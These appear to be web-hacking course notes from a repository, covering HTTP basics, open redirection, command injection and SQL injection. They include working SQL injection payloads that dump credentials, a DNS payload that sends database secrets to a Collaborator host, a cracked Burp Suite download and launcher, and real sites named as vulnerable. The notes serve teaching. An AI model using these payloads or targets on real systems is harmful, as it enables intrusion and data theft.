38 | 39 | ![Web Archi](../photo/url.png) 40 | 41 | # Eg 42 | `https://www.google.com/photos/about/` 43 | 44 | -------------------------------------------------------------------------------- /lesson_notes/w-2.2_Web_Technologies/w-2.1_web_tech.md: -------------------------------------------------------------------------------- 1 | # Web Technologies 2 | 3 | ## Web Application 4 | 5 | - `Web Application` is web-based software that performs actions (function) based on `user input` and usually interacts with a`backend systems` 6 | 7 | ## Web Server 8 | - Software running on the operation system of a server tha allow connections to access a web Application. 9 | 10 | 11 | ## Web Server Root Directory 12 | 13 | - Window 14 | `C:\Inetpub\wwwroot` 15 | 16 | - Linux 17 | 18 | `/var/www` 19 | 20 | - `var`: This directory includes the files for databases, system logs, and the source code for web application itself! 21 | 22 | 23 | ## HTTP 24 | 25 | ![How HTTP Work](../photo/HTTP.png) 26 | #[photo_reference](https://medium.com/sina-ahmadi/java-http-server-616797710f54) 27 | 28 | - `Hypertext Transfer Protocol` 29 | 30 | - HTTP use message-based model 31 | - Client send request message and server send response message 32 | 33 | ## HTTP structure 34 | 35 | ![HTTP_Structure](../photo/http_structure.png) 36 | 37 | 38 | 39 | 40 | #### URL (Uniform Resource Locator) 41 | 42 | - Unique Address for a `Resource` on server 43 | - `Resource` = photo, file, personal prfiles, data, etc.. 44 | 45 | ![URL_Structure](../photo/URL_structure.png) 46 | 47 | [Photo_Reference](https://ahrefs.com/blog/seo-friendly-urls) 48 | 49 | 50 | #### Method 51 | 52 | - The method tells the server what kind of action the client wants 53 | 54 | 55 | `GET` — used to retrieve or read a resource. If successful, the response will contain the resource specified in the URL. APIs mainly deal in JSOn and XML files. 
** GET requests normally carry no message body; their parameters travel in the URL query string, which also ends up in browser history, server logs and the Referer header ** 56 | 57 | `POST` — used to create new resources, including subordinate resources to already existing nouns. A successful response will contain the URL of the newly created resource. 58 | 59 | `PUT` — used to update an existing resource. The request will also contain the new information that should replace the existing one in the resource. 60 | 61 | `PATCH` — like PUT, updates an existing resource, but differently. Instead of sending the new data, it sends instructions on how to modify the current resource. 62 | 63 | `DELETE` — used to, as the name suggests, delete a resource. 64 | 65 | ## HTTP Header 66 | 67 | `You can use a live-header browser extension to monitor headers conveniently` 68 | 69 | ![Header](../photo/request_header.png) 70 | [photo_reference](https://code.tutsplus.com/tutorials/http-headers-for-dummies--net-8039) 71 | 72 | - `key: value` 73 | 74 | #### `Host` Header 75 | - Specifies the hostname (and optional port) that appears in the full URL 76 | - This is necessary when multiple websites are hosted on the same server; like every header it is attacker-controlled, so it is also an input worth testing 77 | 78 | #### `Content-Length` Header 79 | 80 | - Value is the length of the message body (request or response) in `bytes` 81 | - It helps an attacker tell the application's responses to different inputs apart without reading them in full (especially in brute-force attacks) 82 | 83 | #### `Location` Header 84 | 85 | - This header is used when the application redirects a user to a new page 86 | 87 | #### `cookie` Header 88 | 89 | - `cookie` - a small piece of data from a website or web server that is stored on the user's computer by the web browser. 90 | - They can also be used to save for subsequent use information that the user previously entered into form fields, such as names, addresses, passwords, and payment card numbers. Storing secrets like passwords or card numbers in a cookie is a finding in itself: cookies are sent on every request and readable by anything that can reach the browser's cookie store. 
91 | 92 | - This header sends the stored cookies back to the server on every request so that the server can maintain the user's session 93 | 94 | - ** A session cookie is a bearer credential: whoever holds a valid one is treated as that user, so a stolen cookie (via XSS, plain-HTTP sniffing, leaked logs, etc.) can be used in attacks against other application users. This is why session cookies should carry the `HttpOnly` and `Secure` flags ** 95 | 96 | #### Referer Header 97 | 98 | - This header lists the webpage that the user was previously on, `the last page visited` (the header name is spelled `Referer` in HTTP). Because it contains the full previous URL, it can leak query-string data to third parties. 99 | -------------------------------------------------------------------------------- /lesson_notes/w-2.6_Basic_Terminologies/w-2.6.a_Hacking_terminology.md: -------------------------------------------------------------------------------- 1 |

Basic Terminology

2 | 3 | ## 1. Vulnerability 4 | 5 | - A weakness in a system that can be abused to violate its security 6 | 7 | ## 8 | 9 | ## 2. Injection 10 | 11 | - Supplying malicious input to a web application so that it is interpreted as code or commands rather than as data 12 | 13 | ## 3. Injection Point 14 | 15 | - The parameter, header or field where a vulnerability can exist, i.e. the place where attacker input enters the application 16 | 17 | ## 4. Payload 18 | 19 | - A payload is the script, code or crafted input used to identify or exploit a vulnerability
20 | 21 | - In malware, the payload refers to the part of the virus that performs the malicious actions, such as compromising data, destroying information, or hijacking the computer system. 22 | 23 | ## 5. Exploitation 24 | 25 | - Taking advantage of a vulnerability to gain access to a system or its data 26 | 27 | ## 6. Backdoor 28 | 29 | - A hidden entry point into a website or application that bypasses standard security measures like login and authentication 30 | 31 | ## 7. Zero Day 32 | 33 | - A vulnerability that is unknown to the vendor (and therefore has no patch), typically known only to the attackers exploiting it 34 | 35 | ## 8. Phishing 36 | 37 | - Phishing is a type of social engineering where an attacker sends a fraudulent fake message designed to trick a person into revealing sensitive information to the attacker 38 | 39 | ## 9. Cookies 40 | 41 | - A cookie is a small packet of information from a visited webserver stored on your system by your computer’s browser. It is designed to store personalized information in order to customize your next visit -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/Burpsuit_Lacture.drawio.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-3.0_BurpSuit_Ref/Burpsuit_Lacture.drawio.png -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/burpCrack_install.md: -------------------------------------------------------------------------------- 1 | # BurpSuite Crack Installation 2 | 3 | ## BurpSuite Crack Download Link 4 | `https://drive.google.com/file/d/1OQfvQdNfjcx2XafZzNje3U_M0A1op8gw/view?usp=sharing` 5 | > Warning: this is an unofficial, cracked build shared from a personal Drive account. The loader agent is an unverified third-party binary that runs with your user's privileges and sees every request you intercept (including credentials), and the launcher below passes `-noverify`, which turns off JVM bytecode verification. Prefer the official Community edition or a licensed Professional copy from PortSwigger. 6 | ## Desktop Entry(burp.desktop) Code 7 | 8 | ``` 9 | [Desktop Entry] 10 | Name=BurpSuite 11 | Comment=Burp 12 | GenericName=Burp 13 | 
Exec=/usr/lib/jvm/java-11-openjdk-amd64/bin/java --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:/opt/Burp-2020.2.9/BurpSuiteLoader_v2020.9.2.jar -noverify -jar /opt/Burp-2020.2.9/burpsuite_pro_v2020.9.2.jar 14 | Icon=/opt/Burp-2020.2.9/burp.png 15 | Terminal=false 16 | Type=Application 17 | StartupNotify=true 18 | ``` 19 | -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/w-3.1.b_lacture_recap.md: -------------------------------------------------------------------------------- 1 |

Lacture Recap

2 | 3 | ----------------------------- 4 | 5 | ## Objective 6 | 7 | 8 | #### 1. To understand Basic Burp Usage 9 | #### 2. How to scan and find parameter 10 | #### 3. How to repeat the request and testing 11 | #### 4. How to attack using intruder 12 |
13 | 14 | ## Advanced Usage of Sublime Text 15 | ----------------------------- 16 | #### 1. How to install a package 17 | #### 2. How to use an installed package 18 | #### 3. How to use markdown preview 19 | #### 4. How to build in Sublime 20 |
21 | 22 | ## Lab Link 23 | ---------------------- 24 | #### 1. `http://testphp.vulnweb.com/` 25 | 26 | #### 2. `http://lab.awh.exdemy.com/chapter1/DVWA/login.php` 27 |
28 | 29 | ## Example Wordlist 30 | ---------------------- 31 | ``` 32 | test 33 | admin 34 | password 35 | root 36 | 1234 37 | toor 38 | abcd 39 | 40 | ``` 41 | -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/w-3.1.c_test_wordlist.txt: -------------------------------------------------------------------------------- 1 | test 2 | admin 3 | password 4 | root 5 | 1234 6 | toor 7 | abcd 8 | -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/w-3.1.d_BurpDecodeErrorSolve.md: -------------------------------------------------------------------------------- 1 | ## Ctrl+shift+U (Url Decode) not working solution 2 | 3 | ``` 4 | 5 | This shortcut can be changed or disabled using the ibus-setup utility: 6 | 7 | 8 | 9 | 1. Run ibus-setup from the terminal (or open IBus Preferences). 10 | 11 | 2. Go to “Emoji”. 12 | 13 | 3. Next to “Unicode code point:”, click on the three dots (i.e. ...). 14 | 15 | 4. In the dialog, click “Delete”, then “OK”. 16 | 17 | 5. Close the IBus Preferences window. 18 | 19 | 20 | 21 | Reference: https://superuser.com/questions/358749/how-to-disable-ctrlshiftu 22 | ``` 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /lesson_notes/w-4.0_open_redirection/w-4.1.a_Basic Theory about Openredirection.md: -------------------------------------------------------------------------------- 1 | 2 |

Open Redirection

3 | 4 | 5 | ## Definition 6 | 7 | - redirection to an arbitrary external domain 8 | (user can manipulate this redirect parameter) 9 |
10 | 11 | - Open Redirect vulnerabilities don't get enough attention from developers because they don't directly damage the website and do not let an attacker directly steal data that belongs to the company. They matter because the trusted domain lends credibility to a phishing link, and because a redirect on a trusted host can be chained with other bugs (for example to get past an SSRF allow-list, as in the lab linked below). 12 | 13 | ## Example url 14 | 15 | + ` http://example.com/example.php?url=http://malicious.example.com` 16 | 17 |
18 | 19 | 20 | ![Web Archi](../photo/openRe.png) 21 | 22 | ## How to Exploit 23 | 24 | ### 1. Phishing 25 | 26 | 27 | ![Web Archi](../photo/phishing.png) 28 | 29 | ### 2. Execute JavaScript (XSS attack) 30 | 31 | - Rare in modern browsers, which refuse to follow a `javascript:` URL in a redirect 32 | 33 | - Example (not working now) 34 | + `https://example.com/index.php?go=javascript:alert(document.cookie)` 35 | 36 | 37 | ## How to Prevent 38 | 39 | - Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs 40 | 41 | 42 | 43 | - Do not let the user control where your page redirects. If a redirect parameter is unavoidable, accept only relative paths or values from an allow-list of known destinations, and validate the whole parsed URL rather than checking for a substring such as the expected domain 44 | 45 | 46 | 47 | - Warn the user before leaving the site 48 | + eg: `https://google.com/amp/bing.com` 49 | 50 | 51 | ## Major words use in redirect 52 | 53 | ``` 54 | url 55 | RelayState 56 | ReturnUrl 57 | RedirectUri 58 | Return 59 | Return_url 60 | Redirect 61 | Redirect_uri 62 | Redirect_url 63 | RedirectUrl 64 | Forward 65 | ForwardUrl 66 | Forward_URL 67 | SuccessUrl 68 | Redir 69 | Exit_url 70 | Destination 71 | ``` 72 | 73 | 74 | 75 | ## Google Dorking For Open Redirection 76 | 77 | ``` 78 | allinurl:"=https" 79 | allinurl:"=http" 80 | allinurl:=https 81 | allinurl:=http 82 | allinurl:%3Dhttps 83 | allinurl:%3Dhttps* 84 | allinurl:%253Dhttps 85 | allinurl:%253Dhttps* 86 | allinurl:%3Dhttp 87 | allinurl:%3Dhttp* 88 | allinurl:%253Dhttp 89 | allinurl:%253Dhttp* 90 | allinurl: 91 | ``` 92 | 93 | ## Example Vulnerable Website 94 | 95 | 96 | 1. `http://educratsweb.com/` 97 | 98 | + ### vulnerable Parameter 99 | 100 | `http://educratsweb.com/l.php?url=https://scholarships.gov.in/fresh/newstdRegfrmInstruction` 101 | `http://tapestry.click/Count.php?Link=https://www.oxy.edu/&Type=Org&ID=US-OCCDNT` 102 | 103 | 104 | ## Lab Link 105 | 106 | `https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection` 107 | 108 | 109 | ## Example Bounty Price 110 | 111 | 112 | ![Web Archi](../photo/openBounty_1.png) 113 | 114 |
115 | 116 | ![Web Archi](../photo/openBounty_2.png) 117 | 118 |
119 | 120 | ![Web Archi](../photo/openBounty_3.png) 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | -------------------------------------------------------------------------------- /lesson_notes/w-5.0_Command_Injection/w-5.1.a_CommadI_Theory.md: -------------------------------------------------------------------------------- 1 |

Command Injection Essential Theory

2 | 3 | # Command Injection Definition 4 | 5 | * Operating system command injection 6 | vulnerabilities arise when an application 7 | incorporates user-controllable data into a 8 | command that is processed by a shell command 9 | interpreter. The fix is to avoid the shell entirely (invoke the program with an argument array) or, failing that, to validate the input against a strict allow-list. 10 | 11 | 12 | # Theory for Command Injection 13 | 14 | ![Web Archi](../photo/com_inject.png) 15 | 16 | # Type of Command Injection 17 | 18 | 1. Result Based (Output > Visible in the response) 19 | 2. Blind Based (Output > Not visible; confirm with a time delay such as `sleep 5` or an out-of-band request) 20 | 21 | 22 | # General Testing Process 23 | 24 | ### 1. Select Entry Point (Parameters) 25 | ### 2. Testing with Payload (delimiters) 26 | ### 3. Exploit 27 | ### 4. Maintaining access 28 | 29 | 30 | 31 | # Tools for Exploiting Command Injections 32 | * commix (Command Injection Exploiter) 33 | * Example Usage 34 | - `python commix.py --url="http://192.168.32.130/vulnerabilities/exec/"` 35 | 36 | 37 | 38 | 39 | # Command Parameters that can be considered for testing 40 | 41 | ``` 42 | cmd 43 | exec 44 | command 45 | execute 46 | ping 47 | query 48 | jump 49 | code 50 | reg 51 | do 52 | func 53 | arg 54 | option 55 | load 56 | process 57 | step 58 | read 59 | function 60 | req 61 | feature 62 | exe 63 | module 64 | payload 65 | run 66 | print 67 | ``` 68 | 69 | 70 | 71 |

Links for this lecture

72 | 73 | ## My github Link 74 | 75 | `https://github.com/Dr-404/WebHacking` 76 | 77 | ## Shell Link for exploit 78 | 79 | `https://github.com/Dr-404/WebHacking/tree/main/shells/AlphaShell` 80 | 81 | 82 | ## Labs Link 83 | 84 | `http://lab.awh.zdresearch.com/` 85 | 86 | 87 | 88 | ## Command Injection Payloads 89 | ``` 90 | https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-execution-unix.txt 91 | 92 | ``` -------------------------------------------------------------------------------- /lesson_notes/w-5.0_Command_Injection/w-5.1.b_delimiters.md: -------------------------------------------------------------------------------- 1 | # Shell operators (command chaining) used in command injection 2 | These characters are interpreted by the shell, so they only work when the application hands the input to a shell interpreter. When they are sent in a GET parameter they must be URL-encoded (`;` → `%3B`, `&` → `%26`, `|` → `%7C`). 3 | 4 | ### 1. `&&` (Logical AND) 5 | > the command after this operator runs only if the command preceding it exited successfully (status 0) 6 | 7 | ### 2. `;` (Semi-colon) 8 | > the command after this operator runs regardless of whether the preceding command succeeded or failed. 9 | 10 | ### 3. `||` (logical OR) 11 | > the command after this operator runs only if the command preceding it failed. 12 | 13 | ### 4. `|` (Pipe) 14 | > The output of the first command becomes the input of the second command -------------------------------------------------------------------------------- /lesson_notes/w-5.0_Command_Injection/w-5.2.c_phpCodes/commandInject_1.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Code Injection 7 | 8 | 9 |
10 |

11 | Enter Your Command: 12 | 13 | 14 |

15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 | {$cmd2}
"
27 | 
28 | 
29 | 
30 |  ?>


--------------------------------------------------------------------------------
/lesson_notes/w-5.0_Command_Injection/w-5.2.c_phpCodes/commandInject_2.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 	
 5 | 	
 6 | 	Code Injection
 7 | 
 8 | 
 9 | 	
10 |

11 | Enter an IP address: 12 | 13 | 14 |

15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 | {$cmd}
"; 29 | 30 | 31 | ?> -------------------------------------------------------------------------------- /lesson_notes/w-5.0_Command_Injection/w-5.5.a_out-of-band_theory.md: -------------------------------------------------------------------------------- 1 |

Out-of-band Injection Theory

2 | 3 | ### OOB injection is an exploitation technique that exfiltrates data through a different, outbound channel (typically DNS or HTTP) which the database or OS opens toward a server the attacker controls, instead of through the application's own response 4 | 5 | ## Traditional Injection Technique (In-Band) 6 | 7 | 8 | ![Web Archi](../photo/inband.png) 9 | 10 | #### eg SQL database query to make a DNS request (MySQL on a Windows host: the `\\\\host\\share` UNC path forces a name lookup of the attacker's domain, and the data is carried in the subdomain labels) 11 | 12 | ``` 13 | select 14 | load_file(CONCAT('\\\\',(SELECT+@@version),'.',(SELECT+user),'.', 15 | (SELECT+password),'.','n5tgzhrf768l71uaacqu0hqlocu2ir.burpcollabo 16 | rator.net\\vfw')) 17 | ``` 18 | 19 | 20 |
21 | 22 | ## OOB Injection 23 | 24 | 25 | 26 | ![Web Archi](../photo/oob.png) 27 | 28 | # How to get a listening server 29 | 1. Install BurpSuite Professional (the Collaborator is a Pro feature; a cracked copy is an unverified binary, so any DNS/HTTP listener you control yourself is a safer alternative) 30 | 2. Use the Burp Collaborator Client to obtain a unique domain 31 | 3. Make the target issue a DNS request to the listening server 32 | 4. Collect the captured info 33 | 34 | 35 | ## Formula 36 | 37 | ### For Command Injection 38 | 39 | `OOB Command injection = Fi . (system commands + FQDN)` 40 | 41 | where, 42 | 43 |
44 | Fi     = function that initiates outbound request
45 | FQDN = domain name of the listening server (Burpcollaborator domain name) 46 |
47 | 48 | ### For Sql Injection 49 | 50 | `𝑂𝑂𝐵 𝑆𝑄𝐿𝑖 = 𝐹𝑖. (𝑆𝑄𝐿 𝑐𝑜𝑚𝑚𝑎𝑛𝑑𝑠 + 𝐹𝑄𝐷𝑁)` 51 | 52 | 53 |
54 | Fi     = function that initiates outbound request
55 | FQDN = domain name of the listening server (Burpcollaborator domain name) 56 |
57 | 58 | 59 | #### References 60 | A Study of Out-of-Band Structured Query Language Injection by Lee Chun How (doi: 10.5281/zenodo.3556347) 61 | -------------------------------------------------------------------------------- /lesson_notes/w-6.0_sql_injection/6-1_basic_SQLi.md: -------------------------------------------------------------------------------- 1 | # SQL injection 2 | 3 | ## Definition 4 | 5 | >A SQL injection is a technique that attackers use to gain unauthorized access to a web application database by supplying input that is concatenated into a database query, so that it is interpreted as part of the SQL statement rather than as data. The root cause is building queries by string concatenation; the fix is parameterized queries (prepared statements). 6 | 7 | 8 | 9 | ![Basic SQL](../photo/sqli.png) 10 | 11 | photo credit to [original_Link](https://www.cloudprotector.com/sql-injection/) 12 | 13 | * To understand SQL injection you need to understand basic SQL queries 14 | 15 | ## SQL Basic 16 | 17 | * Three types of SQL command 18 | - DDL: Data Definition Language 19 | - DCL: Data Control Language 20 | - DML: Data Manipulation Language (the one mainly used in injection) 21 | 22 | ## Data Manipulation language (DML) 23 | 24 | #### CRUD operation 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 |
| No | CRUD operation | SQL command |
|----|----------------|-------------|
| 1  | Create         | INSERT      |
| 2  | Read           | SELECT      |
| 3  | Update         | UPDATE      |
| 4  | Delete         | DELETE      |
56 | 57 | SELECT is the statement most used in SQL injection 58 | 59 | 60 | ## SQL language structure 61 | 62 | **SELECT** something **FROM** table **WHERE** conditions **GROUP BY** grouping_column **HAVING** aggregate_condition **ORDER BY** order_field 63 | 64 | ## SQL command flow chart 65 | 66 | ![SQL Flow Chart](../photo/sqli2.png) 67 | 68 | Credit to original photo [Stackoverflow](https://stackoverflow.com/questions/20940363/how-do-you-read-sqlite3-diagrams-flowcharts) 69 | 70 | ## Example SQL Command 71 | 72 | Find the brand and price of the computers in the shop that cost more than 1000 USD 73 | 74 | #### Example Database
75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 87 | 90 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 |
**Shop**

| id | brand  | price |
|----|--------|-------|
| 1  | Lenovo | 700   |
| 2  | Dell   | 1200  |
| 3  | Acer   | 1500  |
111 | 112 | #### Example SQL query 113 | ``` 114 | SELECT brand, price 115 | FROM shop 116 | WHERE price > 1000 117 | ``` 118 | 119 | 120 | ## Most used queries in SQL injection 121 | 122 | #### 1. UNION 123 | ``` 124 | SELECT 1,2,3 UNION SELECT 4,5,6; 125 | ``` 126 | 127 | * the number of columns must match 128 | * compatible data types 129 | * same order 130 | * can be used to find the number of columns (not common) 131 | 132 | #### Demonstration using the university_small database 133 | 134 | * Watch the lecture video and try to understand how the union operator works 135 | * There were two tables **instructor** and **course** 136 | 137 | **Select from only one table** 138 | 139 | `SELECT * from instructor;` 140 | 141 | 142 | 143 | **Using union select to extract data from a different table** 144 | 145 | `select * from instructor union select course_ID,title,dept_name,credits from course;` 146 | 147 | #### example query finding column count 148 | 149 | `select * from instructor union select 1,2,3,4;` 150 | 151 | 152 | 153 | 154 | #### 2. Using a **TRUE** condition to extract data from a table 155 | 156 | **Normal_Query** 157 | 158 | `SELECT * FROM instructor WHERE id=10101` 159 | 160 | **INJECTION** 161 | 162 | `select * from instructor where id=0 or 1=1;` 163 | 164 | #### 3. GROUP_CONCAT or CONCAT 165 | 166 | The GROUP_CONCAT() function concatenates all the rows of the returned result into one string, so a whole column can be read through a single output field 167 | 168 | `select * from instructor union select group_concat(name,' : ', ID),2,3,4 from instructor;` 169 | 170 | #### 4. ORDER BY 171 | 172 | * Used to find the number of columns: ordering by a column index larger than the column count raises an error 173 | 174 | `select * from instructor order by 4;` 175 | 176 | #### 5. (-- or --+) 177 | * SQL comment (comments out the rest of the query). MySQL requires a space after `--`; the `+` in `--+` becomes that space when the URL is decoded 178 | 179 | #### 6. Database() 180 | * show database name 181 | 182 | #### 7. 
user() 183 | * show the database user account the application connects as (if this is a high-privilege account such as `root`, an injection reaches far more than the application's own schema) 184 | 185 | 186 | 187 | 188 | 189 | ## Type of SQL injection 190 | 191 | 192 | 193 | ![SQL Type](../photo/sqli3.png) 194 | 195 | Credit to [purplebox_paper](https://medium.com/purplebox/sql-injection-da949c39dbe6) 196 | 197 | -------------------------------------------------------------------------------- /lesson_notes/w-6.0_sql_injection/6-2_finding_SQLI.md: -------------------------------------------------------------------------------- 1 | # How to find SQL Injection Vulnerability 2 | 3 | ## Methodology 4 | 5 | 1. Find a parameter to inject 6 | 2. Identify the vulnerability 7 | 3. Enumerate data from the database 8 | 4. Upload a backdoor 9 | 10 | 11 | ## 1. Finding Parameter 12 | 13 | 1. Intercept the traffic with the Burp proxy and scan to obtain parameters (identify every data entry point on the web application) 14 | 2. Visit the web application thoroughly 15 | 16 | #### Main Parameters of Injection 17 | 18 | 19 | 1. GET Parameter 20 | 2. POST Parameter 21 | 3. Cookies (usually used for authentication, session control) 22 | 4. Header (Host, Referer, User-Agent) 23 | 24 | 25 | **Note**:
26 | 27 | The Host header field specifies the 28 | Internet host and port number of the resource being requested. The Referer field specifies 29 | the resource from which the current request was obtained. The User-Agent header field 30 | identifies the Web browser used by the user. Although these cases are uncommon, some network monitoring and Web trend applications use the Host, Referer, and User-Agent header 31 | values to create graphs, for example, and store them in databases. In such cases, it is worth testing 32 | those headers for potential injection vulnerabilities (the injection may only fire later, when the stored value is read back — a second-order injection). 33 | 34 | 35 | 36 | ## 2. Identify the vulnerability 37 | 38 | 1. Manipulate parameters to make the application produce an error 39 | 40 | `http://testphp.vulnweb.com/listproducts.php?artist=1` 41 | 42 | 2. Identify the error and the type of database 43 | 44 | Example Error 45 | 46 | `You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘VALUE’’.` 47 | 48 | 49 | This error shows 50 | * DBMS type = MySQL (named in the message) 51 | * Exact syntax that caused the error = single quote 52 | * Where the error occurred = after the parameter value 53 | * 54 | ## 3. Enumerate data from the Database 55 | 56 | ![SQL Flow Chart](../photo/sqli4.png) 57 | 58 | 59 | 60 | #### Finding Table Name 61 | 62 | ``` 63 | SELECT GROUP_CONCAT(table_name) 64 | FROM information_schema.tables 65 | WHERE table_schema=database() 66 | ``` 67 | 68 | #### Finding Column Name 69 | 70 | ``` 71 | (SELECT GROUP_CONCAT(column_name) 72 | FROM information_schema.columns 73 | WHERE table_name='users') 74 | ``` 75 | Add `AND table_schema=database()` to the WHERE clause when the same table name exists in more than one schema, otherwise columns from other databases are mixed into the result. 76 | #### Enumerate all data 77 | 78 | ``` 79 | SELECT GROUP_CONCAT(name,pass) FROM users 80 | ``` 81 | 82 | 83 | ## 4. Upload Backdoor ??? 
-------------------------------------------------------------------------------- /lesson_notes/w-6.0_sql_injection/6-3_errorBased_SQLi.md: -------------------------------------------------------------------------------- 1 | # Error Based (Double Query) SQL Injection 2 | 3 | - `A double query` combines two queries into a single query and gets the information through the SQL error message returned by the database. 4 | 5 | - Union injection cannot be used when the web page does not display any query results (but does display database error messages) while we inject it with a single query; then we should use the double query SQL injection technique. It is a manual injection technique to dump the data from the database. 6 | 7 | [Reference](https://securiumsolutions.com/blog/sql-injection-by-double-query-securiumsolutions/#:~:text=A%20double%20query%20SQL%20injection,error%20message%20from%20the%20database.) 8 | 9 | 10 | # Mysql Query for Error Based Injection 11 | 12 | ## 1. `Sub-Query` or `Double Query` 13 | 14 | - `A subquery is a SQL query nested inside a larger query.` 15 | 16 | - A subquery may occur in : 17 | - A SELECT clause 18 | - A FROM clause 19 | - A WHERE clause 20 | The subquery can be nested inside a SELECT, INSERT, UPDATE, or DELETE statement or inside another subquery. 21 | A subquery is usually added within the WHERE clause of another SQL SELECT statement. 22 | 23 | 24 | ## 2. `rand()` 25 | 26 | - This function returns a random decimal number between 0 and 1. 27 | 28 | ## 3. `floor()` 29 | 30 | - The function returns the largest integer value less than or equal to the given number, so `floor(rand()*2)` is always either 0 or 1 — a two-valued key, which is what the duplicate-key trick below relies on. 31 | 32 | ## 4. `Group by` 33 | 34 | - Groups rows that share the same value in the column into a single row 35 | 36 | ## 5. `count` 37 | 38 | - Counts the number of rows in the result 39 | 40 | 41 | 42 | 43 | # Theory of Error Based or Double Query Injection 44 | 45 | 46 | 1. Combine two queries into a single query 47 | 2. Use SQL functions to make the application show an error message 48 | 3. 
dump juicy info through the error message 49 | 50 | 51 | 52 | # Example mysql functions to make the application error 53 | 54 | ## 1. count() 55 | 56 | `select count(*) from information_schema.tables;` 57 | 58 | - displays how many rows are in `information_schema.tables;` 59 | 60 | ## 2. rand() and floor() 61 | 62 | `select rand();` 63 | `select floor(rand()*2);` 64 | `select floor(rand()*2)test;` 65 | 66 | 67 | ## 3. Double Query and Make Application Error 68 | 69 | #### Extract juicy info from an error 70 | 71 | `select x from y;` (a probe: if the error message echoes back parts of the query, data can be smuggled out through it) 72 | 73 | #### Double Query 74 | 75 | - `select database();` 76 | 77 | - `select concat("::",database(),"::","CONCAT FUNCTION");` 78 | 79 | - `select concat("::",database(),"::",floor(rand()*2));` 80 | 81 | #### adding alias `a` 82 | 83 | - `select concat("::",database(),"::",floor(rand()*2))a from information_schema.columns;` 84 | 85 | #### `group by` with a 86 | 87 | - `select concat("::",database(),"::",floor(rand()*2))a from information_schema.columns group by a;` 88 | 89 | 90 | #### use `count()` to make the web application error 91 | 92 | `select count(*), concat("::",database(),"::",floor(rand()*2))a from information_schema.columns group by a;` 93 | Why this errors: `group by` builds a temporary table keyed on `a`, but `rand()` is re-evaluated while grouping, so MySQL can try to insert a key that already exists and fails with `Duplicate entry '::dbname::1' for key 'group_key'` — the concatenated value is leaked inside the error text. The collision is probabilistic, so re-send the request if no error appears. 94 | #### Modified query 95 | `(select 1 from(select count(*), concat("::",database(),"::",floor(rand()*2))a from information_schema.columns group by a)b);` 96 | 97 | 98 | #### insert this query into the `,database(),` area 99 | 100 | `(select table_name from information_schema.tables where table_schema=database() limit 0,1)` 101 | 102 | 103 | 104 | # Enumerating the Database 105 | 106 | ## Enumerating database 107 | 108 | `(select 1 from(select count(*), concat("::",database(),"::",floor(rand()*2))a from information_schema.columns group by a)b);` 109 | 110 | ## Enumerating Tables (`insert query in database area`) 111 | 112 | `(select 1 from(select count(*), concat("::",(select table_name from information_schema.tables where table_schema=database() limit 0,1),"::",floor(rand()*2))a from information_schema.columns 
group by a)b);` 113 | 114 | ## Enumerating Columns (`insert query in database area`) 115 | 116 | `(select 1 from(select count(*), concat("::",(select column_name from information_schema.columns where table_name="users" and table_schema=database() limit 0,1),"::",floor(rand()*2))a from information_schema.columns group by a)b);` 117 | 118 | ## Enumerating Data 119 | 120 | ### enumerating username 121 | 122 | `(select 1 from(select count(*), concat(concat("::::",(select name from users limit 0,1)),floor(rand()*2))a from information_schema.columns group by a)b);` 123 | Increase the `limit` offset (`limit 1,1`, `limit 2,1`, …) to walk through the rows one at a time; the inner select must return a single row. 124 | ### enumerating all data 125 | 126 | #### 1. Removing all queries within `concat` 127 | 128 | `(select 1 from(select count(*), concat((),floor(rand()*2))a from information_schema.columns group by a)b);` 129 | 130 | #### 2. Adding another `concat` to insert another query 131 | 132 | `(select 1 from(select count(*), concat(concat(),floor(rand()*2))a from information_schema.columns group by a)b);` 133 | 134 | #### 3. Adding a select statement to dump data 135 | 136 | `(select 1 from(select count(*), concat(concat((select name from users limit 0,1)),floor(rand()*2))a from information_schema.columns group by a)b);` 137 | 138 | 139 | 140 | #### 4. 
Adding another concat (`in the name area`) to dump all columns of a row from the users table 141 | 142 | `(select 1 from(select count(*), concat(concat("::::",(select concat(name,":::::::",password,":::::",status,":::::",work) from users limit 0,1)),floor(rand()*2))a from information_schema.columns group by a)b);` 143 | Note that MySQL truncates the duplicate-key value shown in the error message, so a long concatenation may be cut off; if the tail is missing, shorten the separators or read the fields in smaller groups. 144 | 145 | 146 | 147 | ## Full lab query (ZD-Lab, SQLi, Lesson-5) 148 | 149 | `AND+(select+1+from(select count(*), concat("::",(select table_name from information_schema.tables where table_schema=database() limit 0,1),"::",floor(rand()*2))a from information_schema.columns group by a)b)--+` 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | -------------------------------------------------------------------------------- /lesson_notes/w-6.0_sql_injection/6-4_Blind_SQL_Injection.md: -------------------------------------------------------------------------------- 1 |

